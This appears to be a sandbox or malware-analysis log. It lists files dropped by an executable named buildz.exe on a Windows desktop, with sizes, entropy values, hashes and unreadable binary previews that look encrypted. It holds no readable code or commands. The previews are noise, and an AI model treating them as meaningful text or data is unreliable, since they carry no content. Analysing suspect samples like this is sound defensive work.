                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):3214
                        Entropy (8bit):7.93991436891066
                        Encrypted:false
                        SSDEEP:96:ffKp69AVUebknPMy5TBpmUOBWYHH8BlTDB7A:HKYuVPgPLTBEBWY8LZA
                        MD5:655585010329D096AC332AEB513AE6D6
                        SHA1:D7883EA33EDB4570ED3FB65735EA50E988D65670
                        SHA-256:56F1F58C820A03B84B2E18DE5A1EF0955C095F73E468D3BFBB186C74EDC1EB97
                        SHA-512:B03145B912DEADF7C7D209808AE4004BCDF7BF6AC7532D56F038AF647B376A9BE29F5612169A6A7FC5E4E4FD69DFB9B7F3A199B863DD4FE9650D934922C4D21E
                        Malicious:false
                        Preview:{. "h%?.Sz.Hls....o....:...x.%...2...mF8:./....2......!....;$B.WC[:.......e.%.[i......1..#..S.T...w.Sd_.I.../...Z...?.&......"`.2..,{....12LI..".BD..>.kV&7..L..L^'.:.....&.l.i,..n.p...Y$.?.....9c.8..^..Q.....p4.F%.a..d..y.a.Z/u.**....V.V.@...D.....Q..@\..N......%.Axw.@..I..i.......e..=k.97B..e.Z.._...W.t=._... c.AF ...V......aY.s..h.y....e.a..-!+.z..<...M....@.r..Bu...B.m..D.1...FuW.N...o.=.....U...*..u...8._.*..>.F...w.(#..7..<.9.E..5~9=k.o..ie.^.3.0r.........jt.e......1...E..l..I.c..<.u....4.....1...]..2!..A...^.Y..r.e......}..B..g.<..&......(T)Og9...L..P.%...mn.2f.H.H..z...mJ.X..$\.....k.D{..z.5MB..=..H......{....DE......C.x......(I".0l......5.n..D........3.....rU........h.?A*..Ty......1>!.....I...XE._p],../...u.O|e<........]E.7...A...lS...t......,.'...P........T.B3.^.Iph.?..h..E<.......T......,^..b.....A.{.&.Vq=..4......lB...#..R.;.*..S..R{.V.7../.x.5..].oE.v.....y.)&..4;. ..dg..i.6eh. .B.x..w.)j.....M.E...0p....*j..... ..V..f..P..B{...O
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):3615
                        Entropy (8bit):7.939628863686473
                        Encrypted:false
                        SSDEEP:48:wD3fDKmkUTuxz2Lc/yOvcHu8P6TuKxP8YspUEthoadMgwbrhtoeaL+ojA0ddwTxH:wTvBTEz24K97oxPepsfbMDCkAfxzCA
                        MD5:706C95B18BACFB7277D8BC1EA10EE930
                        SHA1:CEBF8BC4ECFCD2663B4ADD73158B2FD2E7FAC4C3
                        SHA-256:0B9E374F5DAB3DCCA2DC49962E3DA3C8C0380A8057CAC8CE65559D9FEFC2AC33
                        SHA-512:6141C68E13C8F0C52C031952D5393AD7CDAB593CB369E7DDCF615C019DAD30F2F0C96DB2100918A1ED1D9F3F5973D4C7B8B82D180B5F3F7841E19CAD2DE54E48
                        Malicious:false
                        Preview:{. ".........&H..U|.6.4.`...eN..Jh.5]_.....y..[...-!...7..+W.z..i....:._6h.#.7..2.]<...<.T.[..h..3x)u..w...,b'...|...M......V..-...6.Q....H......=7.&N.:.0~/p.{.1..m....N.m....\jk=...5S........h..x../....rI........./....f..g.j...x2Q.....'.(B..."... .....E`{...M.Y.i..a.7y...7...fP.....nkN=.w...dB.......;..=....n]-.p9<.FG...*.2.Xu....!.\,..VM..(.+.h-..e...`..s.V.......7..M..8...9x.*9.....X.^.N..Im.....7.=.>.Y...).q.5.m(.%.......k_[.....f...-.P56.1.;8..@.2.5%j...:...9..K..R...u~.{>.-....+..R...w..-"....b..4....EX.R.h...x...?y |...7..P&.E....q5..'pf..m*..).........K.hw..C.va.IY..O|..o..^...7..rK`NZ.\e..;A5......+....V.#{.....l.f&J...... ...#w....A..#..@w.bcF.....k...8..5./..&;DvAht.8.v....<CzC&..p..?...v(O.K.5...8.K..N.p..._oF...S.<....f...D...P:.`.,.+e.}<......{."Nv}.A`.)B... 9...e.%>.BO.6.....XF.8n&......;..........d%~.4.NE.7..d..~.*"..3..Jz....=...s.%Hl........!GQ.._l..cU.9 4.J.....JJ..gx....Z0..3.ez..v..^..o.......X.?E..*..#...O-....
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):3243
                        Entropy (8bit):7.941243787257291
                        Encrypted:false
                        SSDEEP:96:rvftR8O1rNIZk4J+dogAwZ5KHw6R4g3aA:r3YurNuZezAwPWfYA
                        MD5:DE294666AE388AAD9350559E2306CFB1
                        SHA1:97E94969DE755B73FA5CF62401D0CD30BAA83544
                        SHA-256:911666A5F5118B8F4D0045EDA3659A1EF4496E265253099450A8A46B7FC1118F
                        SHA-512:CBFD577C4B797534804F675EAF2EA534D361EA17AA0CDAC8EEE29AD9961B23C805F6F33F73B6E3F365379292E41581D80E43E7E3F7EA46AECE10BF7622A54BE3
                        Malicious:false
                        Preview:{. "$8$~...zro.#pGOCP...}.O9...&..j6,......3'y.Y..&e9...b_.h,}..W.>..c...]4...h".5I/h1.)C......f....^....I...Y.4...I.%.;........'&]..b.l.P...ul.YO.b....7S....4[/..Ub%.A....5.%..`....3.........*../...qd.m3.7.';w.z.._..R.....I....e...2R1=C..8.0..(W..d..Y...l:..`%....h'..R.ag.Fx.._[$.......E....h.#.0..../.........)>0...H}L2..zT..O.."c ......f..q....$..6.p>...<.]...9k...q...GQ.w.."b.y..@D..HNc.|;,...?....j..v...gD...O..j!c...HJ.co....>.|..K-9{2.9C#.#..|..u...h.S.i`.Z..F.....NV&.'F.a.`...1......p:..@..g.....V@B.eZ...v l............o#a$c........{e>B....e.SR......%oa;..f...\..l..Y.U..zI.c.eJ..U..1..D.#x..O)..z|..y....p....JD.{T..w&b^+K?.".x.]/f......o...w.o..c?..i>N..M.....tw..H../R5..j.....}.+Y.G...`..5.........=.Y\d.$..E....T........j..9.L.dUM<.Q.UF.JA...x...`..N...*..fS._R..pw...1e......R...........h..7../.J<.X.....!..d.F.P..lf._Q.9...9Z...rX7..S..?..N.$C|vn....;.<......,.m.zd..ky.f..gn..V.}..`.&B...z..gz.1.[...esb.*...... .Y...g!Gc`..-R
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):3190
                        Entropy (8bit):7.938644954077672
                        Encrypted:false
                        SSDEEP:48:G6EfKkWSNn3jjAArU8DbZ4i64eRp2kRbIEeMXSLEe9U4YVJhmB6wyDOID793qUD:G6VkWU3jK8Xg4U2kRbBbCI9e1EHZ6A
                        MD5:CC820B6C2735C1CEB121EAB2DE25CA7D
                        SHA1:C8E9018F695715EC1E26942C88ED09560C7E706F
                        SHA-256:99CC5C7E6B252E385F0C88DD734F610A1837F1E7A96E411E780D4BFB083E742B
                        SHA-512:E21D233DD51D573992C64909F959F8830556FDAC5ED4A536CC90FD6BC90C1FF3DF1C2317272FE20B7F8B7A64A248EE5C242A06E7F5DFB77965FD805A44460AAE
                        Malicious:false
                        Preview:{. ".!.W.......$qx..*..2.;..z!S.`f.........~I...=0.......x.f.../...o...n..A3...(..I_....hT.+..TLD.0`G{h....*....m1..t....2K.L...@[=,....Zv.....Z(#..F..T.4.Ti?.6$&.3..N..j..(..G....k....".].z.Z.E.2m<....B.>..3.t.'.|.k...R..;.............)J/...j...QA.C.!*@...1.8V"...N.`k>7#...3..G.p......M;.\.`...&.p1.7.../p....kN!....-:?.^.u.T.TZ.....K.^r`...fXW`.w.&...40.~... `!E .B..MU0.....I.|..'..D.(L.....s...|..T...^.+5..@....}8.x..V.HO}.A..E...l(k.`..6.....X...kb.*>g.....,..s.......#..D.Wj+B.4..6...=.*..e..1}}.4...q..:...Z...c!+=...G.t..~Tu..q.B)...CG.~x...H}..WK...I@@n....b.....?.7ia1.w.G.tg|......L)....}%.;.....n..\........0rO.........nv..W....~.i...........D..........M.I..3E......!..H.xL.y.......i...$..T....H..<......}.7.}......@.UB........I...U.!||..m..7.Jj'\e.hK....6%..:.%.b..p..i.Q1j.M...R.z......6C..*...1.\d.Ws+.BS......*...Ak..o.S.........^.|.# u..,.......H$kXKw.......P.M.W.$.+Z..O..........7.?l=....+..k.R. .|.h.6?......z.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):3300
                        Entropy (8bit):7.943990454404306
                        Encrypted:false
                        SSDEEP:48:OGdKoh8HotobVNaIkvd8Erhwq/2antokvFzrISvI6HDpW2ZT3Px/5V7QWxXWnCBX:8kohNIvW+wEHwSrj8aT3PFQGXWnyfmA
                        MD5:207EADAB6734139FB6BE1440050E64AA
                        SHA1:7F2E3A9271E0A76B0F7C881E101154A146A598B1
                        SHA-256:D17A18DAA358AA5C12E4C79E899851FC51B561C094E1445D896C5CCAC3CE8745
                        SHA-512:D69AB791A5A704FC7092970DFC086600D1982730DD9BAAF298EA2A98E49AD6F231369D62D9256574A342F2D5C864C72E8E010AFD1A1798D5323745AA0EFE0E1B
                        Malicious:false
                        Preview:{. "..<.I..j(..0.#L.|...n'....O.g.......\...:..?'.*.5q..~.z...~m...ks...^..[.....V.|q...P.......{*.pUS.E....BY..Z..8.~K0+1G.....*..sd..J.....~<q3...{[.=+......R.....X..VJ.}..Q..l.k@/..~..;.z..h..b.B#.00.........r~.-.b'.!.....Ye.h..9%.Z...I....~.L.......Zd.t..7...4.....j<..`...FG..g..W:.A..7H.M.@5... ].u.e5r...u.q.9...{V...D.L(.@'L...#.1.W..Y........j.0.v.Hz;.....?.....U....@....v.^B9..C.k....bf>..&.d,.]b..^V,._.....2...H}.4.D...W&..s.).E...m.&U7..=..[1.....H&..O....C.....v...`*EV.:.rBN..f...CS..$.'.......)..S.6.A...(=o..~..n,2.-..0ii..@s...s/.@..~M....Tw.",P....S%.n.j..9&..M3]1+.v.]...,......\....~..Y.Ugl......uP.....IY...$.../...U._.:...t.Y....E.Vsx.>.....m%.t......*F...%.._..*..t......[]{4B.f.M,..g...^..E..o...L!.OkT...z....s-.. ..j\.?.......L..Ks;o..a....&.yx.0..1......h....,[^."`o../..^,_.qG.*.j.....K.Ge.i.r..'.U......Y0z1..ePB..eF_.@.........W2..k.s......m.......L.O4v...R.hW=..4.l.t`..|.5...o .=:J.A.jUn....k.o.P.NZ.!..^..e.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):4040
                        Entropy (8bit):7.956959808889267
                        Encrypted:false
                        SSDEEP:96:dvlgoPQzs/0akVQIg0X3lMZGEMxvKSDgxfO/ftRlSN+tdXvA/riabA:vzZ/pWD+FMxvKlyY+f41A
                        MD5:AE94452161AFAB339A600C646F0609AC
                        SHA1:DA05AADDC69EFC3FF41FC386D64BECCF386D99ED
                        SHA-256:F55A427CF6413BB9B3A1FBFAC6488D1689852803EA1057E4F590D38B775252A3
                        SHA-512:B995B4F3655D8A8D25BA54B67FBBFB093F3BDADFA7B7EFF59231D402F9BB9991681D8522CDB3BD33581E02CACE31AF61B61E3A94C6867C54ECC7E2B3457E2A38
                        Malicious:false
                        Preview:{. "m...Y.5...../m.v..R.XB2X..../.p.o..~..~.....m...sCw.N+V.mi.}.7.dD..H..`.7..*+...8..m...5...%.t...A...>......~"Xrb6....P...:.T.0p .>.K..nF..[iZo~^q.;.7..LZ...M.IW...Y.-.k..5.A...x.EX..s..&..u.D.g.!T.9.G.(H7...3T....[!..rF.9...6....H..1....l<.......>r.1.E8u.#.."S..$.?../.......VA..I....b..BB...>.`..f..V..f)&...['..uo.c.A..O.jH.jh.....z..8.V.."...VY`....i...Mn...b......i.b.._.v+_...<5.>..N[..r.%);"....)..E..Z.OS.....jxB|.K....7.Z.?.].m..@.&Yxp.4..e.UFpO...E...M...bp..........nYe.......$...8.>..........0p.>>.[:4....}.....|^...P...n.I.../^........_gJb%Rj..y<.." /.;.........f....*....Hi...U.Gs./......Vq......8..\....m._^../2FJ..".Q.....\.....2.....8Zd...&..b.#eS.O|...?.X..3.. .&(..\.NU.c! .sUs.@N...QB.....@..[xW...B.VSi...A..a4,.ibc/.......o..Y...%1.$~R.4ji...!.+. .......m...L....[........."7M^.b.%.....<o....M$.C.....Pr[.\p...t........z.Ft...0"......K.w...Y.7./.y..........!...).....F..qKK2x.]....o....w..v..C..d......:...g.....H#...g..
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):3179
                        Entropy (8bit):7.939675247533193
                        Encrypted:false
                        SSDEEP:96:TZRof3DioLoXEo0ZNpv+Z5zfaUNGWmlcm2lA:TjobTDowNpv655Olcm2lA
                        MD5:E86E4EC8FD4D6923D9E73947DD1F37CB
                        SHA1:1A983CC441270F9EAC783A062A99C39117E82384
                        SHA-256:714CC9163C1D3FC6774EEC13C17885D47405ACA4E19C4C5514889B99FC988BF6
                        SHA-512:34E03BF4BD445C7C743159BB8DD529C28E3D247B270DB7C29EA5517ACAB5DBE3829717BEBF5B54DFE4B5ED59960E9DDF34411FFBA0FAE1F9CAAE152F2EA6215A
                        Malicious:false
                        Preview:{. ".0..Q.h.&..6.X....w...;.....o.X...*...?.h=..3..$X..y.0........5....-n..mQ"x..d.#M}7 ...o.1....F....|.>.).s..1....Z7dC.+<....i?!.y....9.t.vkY^.Ggzi[...".......G%.2E.....~&ov.Z6..Z.~.. q..Qxf'.>....^).....+.o#&GI:0.wD.U.=...J.{....f.q.F..Z..?.fz;..9..Q...Ic..A....e.B]....m...R.o......~nM.r....d./.'...L....Lv.L3.)>.z\...Mjf.@.V...FN.5...\..'e....gj........{...|8..c....D.....Iu..8:.{.%../.......@g.....,D. ..j..9.......84.T......DX..s.J:8..o...-..G7...B.....89.[...$<Yp....J!.....p.......G.^.n.p..8........\g......#..8....f...v.%..,...m.O.S1.5....G.g.q?.\...v..A...W...W..w#r. .pC._.....;$...O... ..:.....6q........WC..B.T.........{....tk.H.Vl.......O.H5..2.|!*..EV.Vpb(~...`z..?.2ZG..e.yhV.k...E..m....)R..0..b..*.@Err.....7..n;...n.OgP..J..{HN...`..j`V%...C...C..U....3.=Z.X.'.I...xf.z.3..H...8....._@Lw.e....._..iP...$i..|..U..X =.=...TS..~..6..c..".Z...h..o..O.6......7.N.{WO.|"..j.\....UMr.5P9..e..^W.fb&.f.`.K..b...3|.3..&+.$....C...(.P2.a._.`~..
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):3047
                        Entropy (8bit):7.919211394451341
                        Encrypted:false
                        SSDEEP:48:a/gRmjE8+4ZsS0JLx29TQnHy37HxzSzgbXowp+KPKTlM9hcLniDs9/5R0DwAdCUD:a/EdpnqE8Xowp+KCTmu+s9xR00A
                        MD5:338099D21D55F40D03A4A04F76DC7902
                        SHA1:72D473B923A8E4E6464FD0064C91E07B55BD70A9
                        SHA-256:80CE76CB97BA540FA527D27CA83433096FC83F65F51ABBAF496A3E14B3B208A8
                        SHA-512:CC4010329E192F8BB50E5D3EFAD40BC2E38700CF6601A619216AEC085DBE68C8CD0C33A730D304F5F8E858B8F0A0AC22AB9298EDAB09331C8D31CD8F75C73115
                        Malicious:false
                        Preview:{. "Y.'.H..@...r..M........v..[...I,G... ...c.5........s...P.z.......Mt...=.....6'<..4...N;.Q.uF}..Aa......}..p..e..DX.....V&|..K\.O.)H..C...({|...'4sO.m..}.t..(.G......}.+....Q20.4.U... ....q....:..Jx.nzZ.H.u.9.?..^-]D...W...)F....^...<.mx...?9.I.q.:%.........+9...}.....Iz=)^..l.......Gx...sH.F....0J..?..ff`G@..."._.f............{....G..ZP....v.?.....k...A...N.....6..)m...R....PG.f6........v..S...o..|..c@..X^#_...}.... .Z..h!../........M^.x;h]..;6....B...6.._..7Pb.). .(".8...0..5.;dW_.g&.6;.>....qX....+T.....Y.[+"}p,....kieg&..|1...D.).l*....,./qMPt.QQ.d.4.U.5v...x.s.v.?..}.J0e..vN)..dS..A....n..qD.b..b.9..?-..oN...........,0e.....q#O.PH..d h.a.2-x2..".Y....D...u5Q.68QBq.o..2....,z...K..PPs;.\c^....vf..B..Ud..y\........a..H.......x.B.s.!...H#..-....E......KMV.<...@n......R...V..'e..$.L.}...KF"B.[...:$..H.........T..M..hC7..~zj....6.!.....+.o.7...E.....$..b..l.4.....u....hm.M.a.'...O^......L.V.|.......n...".o}.z...0..........'N.:s.;w.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):3045
                        Entropy (8bit):7.941855265635394
                        Encrypted:false
                        SSDEEP:48:kK0NvZo2XYrl72lJPiH8DwAyHgQkvGuFLY7Xn81pZREKqGrZQF2Z+6biGYmLcUD:kDNv6Brl7TcUAysGuFLY7X815EClQF8P
                        MD5:33B04BCFD2E3FDE08D03DB9C24195166
                        SHA1:4BFFEB3F20DE41FCC286A60EE4F5C0E3404F1386
                        SHA-256:645366081A7A5778C916885A25368A2C755C7DF8545C138A22EF5886A9A6A552
                        SHA-512:FCB4A74A5A6D83FB3DD7993FC74395D586EF7FDC158DD480A1D28E75C957BD94285816F2B6CC111A9173A936831AD401A0C50C5262B50A9589F55BCE446BEEF6
                        Malicious:false
                        Preview:{. "\...s.9.p"...(S.4a.!S...."....1h...Qj.jB...8!%.|..B..o..-..8...O{.V....(y'...D.....uw...&.......8..6*.W.0r.w...%..W...d.QD....QR........,wA...#nz^.s.}..,.]c...2K..A`...nPD-.........H..y....`...0d...../..1D....s..s.D..%TC....{n.B..p?.mA.... .zIs?..Y....(.....!L.l.E$.M.....B..J;......L.:&...'}..@..!...4...T,.?.k??.....u.}!.S...q]...U....+..2.....&F0..H.i.K.......*..8G..5......c......1..t..M.8.)...N.\......)/....].,.4}.......K....L..M.}e.H.,u..&. .>..&..?..h......'.0..D.%./..x.j.k....w....O..R9+.7E.'.!...z.T.b.d....TsB.]."...BhS.....*M...D.........u.|...BZ...0.0..r..0U..j."......^_[..o.4Q3^.lA...u.>op..<,..BbH;Mknp..9.T.W...Xv*.U.[......}....}..P..?e.`=..i...6..F..!.9.MMEl..|../.E....M%.x.i......^OD.....2.(=.F...'..:,./..?...Q..%.....J.,ZX....62.5..f..d...x.w.\L.i....&|.......N{..#.....;...g >......e.....>..Q....OaN..(2..f.j....?H.i..Ozxr_..$*=|......W!2.zX)|.Dr..6...WsTn..{%9..c..O~d.;.b......!..B....;."".G.f..iY.4...Vv.B...O........
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):7056
                        Entropy (8bit):7.973735752423383
                        Encrypted:false
                        SSDEEP:192:l52jQTa7nx/JKiT1RkJHmEz3DHoBXSKYnuq2PcV0hA:xTexrT1WJHRE5SKKMPC0hA
                        MD5:C67F02C08DA3E0127C737E14510140F2
                        SHA1:D3C8701FA6396539DC593620A04BFDC361A70ECE
                        SHA-256:F1CBB85BA0387B55AFBE031B0ABF563DC4FBE9A295AF2CC910889A76456A5D52
                        SHA-512:3E74C1D2440BAC9DBCBDED3C8902F1798C96B80BE7FB24135B5786FAE0F5BDC574536C16ADAA48628A6CC18673E9614A471C8504CA41E0916ACA332452A6F6EB
                        Malicious:false
                        Preview:{. "%.2m.......crxL.#...@_....T..i...A.s.c.......u.....j..6....{..m..A9..h.....B...P..+......l..'..$t...h....V....FnL.".y..6...g...6...EJ...'....n)Us..Z.j..-..9#...%...P..pq...."R....op....[..]......u-.f..$A......y...p...2../...u}...xC.;..KP.r.d...4..8......Umx.c.n.....8....G.....r....vvy.eH...m..O~...J....H.!....QH..>.....'....9.........~[J'H.A.........p*......Z,}..9...gj..bp.0L...K....!..A...F.T.....@X..c........,.+.y........1.wA.3...h.jw.F.+...}..B]i...x...m[7..;.F.n......-.^...s.`.?.....nr#h%.../L......R...)..F......#.0.6.[..GL.H....o..8.v&..A|......\..7.~.......kU.X.$..'dy..Y..u......S.].=.X._6....+2t.D..\.p...^!6..p.....plF.h..?.A.N3.....n*..=lE.iVp..Y.(.I.;..9.QD..!....>ob.$....}.o.K.......(n.^h..y..#.*.n-2.....h3O.J.E.u..].c.|.{B5..t.*^.....F...N-...qn.....O|.+{..\8&R....w.M.Cjco5h.......,..f......a......'...'..Ii..sZa3....a,.Ra'DT.tPP.... ......j......i.M...]..]I.*p....x.D=..2m.T...&....:.k....[...qyK.E..v+...J..!.I"8.c.J`..X}.t
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):6081
                        Entropy (8bit):7.963968756997799
                        Encrypted:false
                        SSDEEP:96:jBEt6oA0CPb43IkpZ6cj9O47NomzSSFwWUZREVdW4DZc4L7dpAlSqoLBUsJIi7k2:jBZBPbVkPHjrBzS1fZREP1LXdal7oOs7
                        MD5:F43DF1F1F922A9B6DF175C160C7CBC26
                        SHA1:FA11970E6FA1CCD5727213FDC8A677082C07AF87
                        SHA-256:BDE8C0F70B3A3A4CF72278AB0201FB4CBE3281C2FC6B804DB0FFD639A428E2F7
                        SHA-512:4BA0FFA3C0E182ED8816C495275416532831A39406B3C6107CC5EF48323478F33875548B767CFADBEB347A2AC8EB01CFBC972598093E17881662FCCFAF0394F4
                        Malicious:false
                        Preview:{. "Y.&.I..Yc.[V....m....WsE....X..I.....h....T>.%.c...#.Y*..3F.F$.4V.-...g...-.]..2...w....*.._..C.TZ.T...a.Hz... .e..9.=x.b0.%.E...,....2h 5.o.v(.v.........."Vz...QS.q;.g...'..|.b...).....&..&..$I.'.)."...Y`...:...R.. ......&...?9.1..%.../.z^...$............B......d..~\.........;.r.e(..v.f5....t.6...............Cr.g-...0g...b..Fx.'<[..j..j.}%^....4..R.f.;..U.8t..I\....9....~.*..Ma.v..wd..0.X..j>C...r..P..#(p..........5.,..O.......]z+.R.X.....X...$..]....h....l.2.U..e.<......R3.fU.G..2...j.BktzH.Sa.xo.....CSWH$.l.1.F~.C0..}.N...Q...d.....sp.7q.L...D.EY.'.$....Q7..x.F..;.Wr.LxUi..,....]....B.s_-C....M...:o...A...Z.7.|xX-RV.`.+......A:mF1..4...V.."7.G.%R..@......5?....DX.aV:zV..;...=...|B.X.p.....j.......at..![..q.d..%`S.q...A..6n..|..Y.3...@.M.."m..{Kc..i..Yu.n@.r..(f.OM..'...:@.T;..C>.cBH].....[...R...-..m..Ey.....p..qr...9...]..e:.9\..O.[...X.SZ.....C...c.D.`fF4e.v..N2..Z.....=.F.s...]G.*..9.....T.....\..\. .....2..V%.....`<*...K..
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):5390
                        Entropy (8bit):7.96896234663224
                        Encrypted:false
                        SSDEEP:96:hrrgxBCifuux6p8B2Y6nQt+U7I9rFSAzaBpr0wGeA:h6hfuuoSWnAChdzaBpr0wGeA
                        MD5:20805F55C0E0ACD8E89305D0F0A969FC
                        SHA1:A01CF50CEB12425F8012236A0C447CE41DA1D22E
                        SHA-256:5852312627A2E2D1BD83BC863A87E6D690C472318E6B4CC695E765AFE4029083
                        SHA-512:3E423A2830FE11ED3C1FAC7EBF7F81F00912B11ABE0AAF615C139606F991C42FBD16471297A2E06CA900967F0AF7E229A4739304A78ED2C26B4106726DFB49B0
                        Malicious:false
                        Preview:{. "...$.d..........!.<I..S>.$1...z..V..`.i,.A..J....%.S....j.}.b..g_C6..=....Qj.%.o.....a.E.....u:j..pHC.. -I.....>_.S.L.U.....}#^0.}...U..>.......~{Nc..K6...&C.{.{.(.l....d....Yk9.w.x..8....B.....CX.".n3.........g.UTf.........i4V._..e../^/..RA....l...<..bXa......]-..!.g.e..u_.?B..M......F..Q.S..epJ.C..f.....YX..._.....d.Q.<O../.^B..@...7.9`.X.X[i.cm.....+.....N.....1...VI0..X.LY..f...@..7.n..K.....t.........\K.]...m.&%P....r..f...1... ...s4vZVN.}..b....c..."f..`....|.)@.v.PqQ'....#....I..............#1w.b..76..r.....u..99e....u..Q%....l4......U.`.uhk...H..PUA...r...}.UM..I..N..E...r^.....Oa....WF..F..jO9...06..G...!.n.A.(........q..@............8.1........T.L:.F..6..=.....o......].N}4-|..V3........NO... 'L.%q.x.9A..l...O.....'..D.3rq.lB1..@..e...Mx.........Y.$.G."..D..AY>.{.|.x.^G%..".....DRa....P......?o<....c..F......;l(B....NP.B..t...5] ..+8MN...t...NU.7~.'..x..~..FF...'......l.o5ao..D..m...'.c...w......."..p.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):5902
                        Entropy (8bit):7.973569692429328
                        Encrypted:false
                        SSDEEP:96:/vHDn2grqxd4yJhpOudWT1dVUsPj6HyHARIkgKfq4iRLZrj5je6LsbEJTQQA:zDrXyTpOY6LVtrgiLZP5C6LsbuTzA
                        MD5:DFDFFE6724563B8F7EE235C2F1418E15
                        SHA1:5F389B529D155CF3667D28AFB9B64EF49AAEC1A6
                        SHA-256:50F402E2F2DBB0A81BFBE352EFA47DC200BD934422329572F91548123014D1E1
                        SHA-512:E8E2004A4329FE9721DB7CF9F8A7063081BB41DBEB6B7E9F0EA88D4662976A25E8B864E17C373B63352B4978766FA1C6ED83B693E1C980D9949CEF27C7438960
                        Malicious:false
                        Preview:{. "...?..i....!.f....).w..H)..`.4.....<E..].....Z.Kl..4Z.......Dr..T.[.d............SC/K.....6......K.b.^j.....7.a..B..vF..a....&.f...c.c..P.(O.(.O...~V...9V.....N5?Q;.A..z..ZC.0(.h...c.. V.y.$.+.c..H.@....*.......2K.or&8....f.N...)...:..E..0.5..c..[.^.g..Y.@B..s....x.bI)....>,q.S...0.c..G..Q.eS[.t.~ .1.G.~...h.......9.....yJ....7.~.....-.f..2....Wl%:.HAn?S... ....9.4.:s..&..vs.j..|i....S.y:..G.P.N)...e.n.LJ..."6..M.<0K.........A.[^.B;.../x...U..):.O+?....R.p....0W^.1.8.-.....<}.>.... )..[.z4.....wN??6.v../k3#<..<...O... ..x.i....`..^~....r.N.......~'.."......\!.o$.v"FQ....`...H.....@.Cs...w.q...BYL(.j..7.JK....=.....g'}.o..QM._.fY*..%bK.nbp...aj....(...V:......(hZ";....?Q.s0...s..{w-...$[..M.1.....L[.#...z.W.~m.- gO...Wz%(..$..L.\...l.|..jX..y2h....-.]*..n.2....R.....<....kK.&..,.T...i.#...M3RS.V..\.p..E...E.XH...^l.....,KGF1..A..L....5.j.../9..kausfr..Q.....)/E.T..!x.k...n.....2y..m.O..3..f.\.u.u.$4d....cYt...Z..s3...c.....W..[q..U..
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):6225
                        Entropy (8bit):7.972805950809473
                        Encrypted:false
                        SSDEEP:192:DqFvqVWrPIaeYJcDnQY7f0qjAXaRk8WUI9p/HA:aiVW7IaPJuQqXkPZp/HA
                        MD5:5191AC7C291A3C7CE7864DDC66EA86D6
                        SHA1:7EE27489BC5C726E658E8ECFECF1705187671285
                        SHA-256:E981DA839BA11DE87E1C0155B8E390937C8F6FBEEA64D31E50F6C885D5244227
                        SHA-512:BC5413D9D26E091F20F39278CEF6964D69257B551DD3A75D1B1A677EFD844D5125E9BC0EA93D4BADAB917AED598033C3816588D41B1549DB52ADD2C393D13353
                        Malicious:false
                        Preview:{. ".l..y..o.M.C.jV.\....W.2..m...M......" .........c3$.........?.<.;~.Bj..w+K./....n...A.X...@.J..9....jG.Iw..U.G.M.T.J9. $...fG...A9c.6.7p....>-...Q.8@......u*..[XWe9....5....5.c.LW.k...6.T.hAV-..C.....1........H;.T.....v.<X.r.].....1.....J...q6.).bV.N..g....3......! ./%l.....(.g....M..C.D.n\b:$-.....A..E.=crn.[..j..-n..$. ...y....`.+.R.;.4.Z.._..T. L....w*.M{.6X...l.:.....r.=j*X....%..\..Y.&<D2.w.+R.3q.T...P..q..;.._..{...Y...j.q.h.i/.i.......)4.B...U3..s#..........>Z.....aS~z`.Q`?..,_....I..U..\.I].../....M.....E.-...9.A.H..:F.!..f/....qX.......;h.l..b2..D.......|i*.j......,.rV=........X].../.d.s.....v.I<?...]m..b....:e.....".#.Zo8;p...S......U...:....8.yp;........;\.....\.3..l..e...dPq[.Yq...,[Z.uh..{.....D6p.Z.t..14.9....._...3...p.J.'P.R...$5.Y..!.....x..Tf......1.m..sU.XE..l......V..N$M.......3A...r")(U!.)t...x.h....R!.F.. ...c..{...FG.b...8..].E..q......VU..........n...x...3t.ke,.&....l..a..M.Cq...?#....R.IN[..'.../.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):420
                        Entropy (8bit):7.384342395523128
                        Encrypted:false
                        SSDEEP:12:gWY8MbpGUhDVVo5TxJ9i5XmP5W3fs26Gcii9a:gXbXzVkTxI2PkPeGbD
                        MD5:D0AD816C6F11EB306B2E8792ECF42754
                        SHA1:8CB3D5B74657697EB973AAC271F0C3771CDEF699
                        SHA-256:95036789DDADE7BAFFDB97E648AFECE909A93CE2660D3BC5AE1AE43E0F966589
                        SHA-512:1634AF3EB5D97FF102C14F82F853F5CFCA820645A1D212DFAF66CC26D515D4B2591B2EDA752BB2C138301D325773FD8F9E7EB6CE122AB2E61F5288D9A3C79FC7
                        Malicious:false
                        Preview:# Dis..(.#p.........qZ....`...*F.D....~..".(..dfP.!.....{..8.*...I.....$.Tj..HI5.BhT.8.y>..<.34....0Q...............1}.......|.d...}vp...vX;v..........T.j..z..H._.z.'P.A.......AY.[.1..2....`T.F4,.A.W..r....b...,.xQN ........z.F..z...8H>-j.p.wp...l.>.b6..S...R..U!G.b..^$......M..._.1.@...!.}.{...M........$b>Jl...]..O..9.X_..aEdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):21010
                        Entropy (8bit):7.991153799736081
                        Encrypted:true
